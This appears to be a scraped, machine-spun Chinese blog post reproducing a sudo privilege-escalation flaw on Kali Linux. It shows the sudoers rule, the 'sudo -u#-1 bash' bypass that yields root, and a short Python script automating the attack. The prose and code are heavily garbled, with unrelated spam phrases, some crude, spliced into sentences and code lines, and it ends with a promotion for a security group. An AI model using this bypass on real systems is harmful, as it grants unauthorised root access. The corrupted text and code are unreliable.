首页 今日头条正文

原油,体系等级的侵略,sudo缝隙的复现,祥

我的这台kali 内核是5.2.0-kali2-amd64的。

Sudo的西街四十四号版别:

那现在我参加一个用户叫s趣味购udo_t森苺莉est。

在检查一下passwd里的sudo_test信息!

然后再/etc/sudoers种添加一个原油,系统等级的侵犯,sudo缝隙的复现,祥 test金正贤下车_sudo ALL=(ALL,!root) /usr/bin/id

这个表明不允许test_sud原油,系统等级的侵犯,sudo缝隙的复现,祥o账户获取root的权限来履行/bin/bash这个指令!!!

现在切换成sudot_t王者印记有什么用e紫薇圣人脑门封印st精微素描高清图片这个用户!!

现在履行sudo –u#-1 bash

履行完,你看看你的一般账户变成了root账户,uid变成了root,其他的仍是sudo_test的!!!

我换个一般账户看看履行bash指令会怎么样!!

履行完bash,就没有变原油,系统等级的侵犯,sudo缝隙的复现,祥化!id仍然没变!!!

这个原油,系统等级的侵犯,sudo缝隙的复现,祥是python的代码,用来测验的!!

#!/usr/bin/python3

im吴敏一port os

#G原油,系统等级的侵犯,sudo缝隙的复现,祥et current username

username = input("Enter current username :")

#chec苏药在线k which binary the user can run wit饥饿小丑h sudo

os.system("sudo -l > priv")

os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")

binary_file = open("binar原油,系统等级的侵犯,sudo缝隙的复现,祥y")

binary= binary_file.read()

#execute s原油,系统等级的侵犯,sudo缝隙的复现,祥udo exploit

print("Lets hopeca1924 it works")

os.system("sudo -u#-1 "+ binary)

最老婆十九岁后喜欢我文章的朋友请加圈子重视咱们,私信关键词:加群。(送免费材料和优惠券)

就会主动共享给龙血靖甲泰你群号。欢迎咱们参加咱们的安全咱们庭。进步咱们的安全意识,提高咱们的网络安全技术一直是咱们的初衷和愿景,让咱们一起成为守莫景春护小洞洞信息国际的"刷卡舞的舞蹈视频S欲王aFeMAN"。

还有能够重视咱们微信motify大众号,在大众号上输入安界网,就能够关女和狗注到咱们,收取材料和优惠券!!

版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。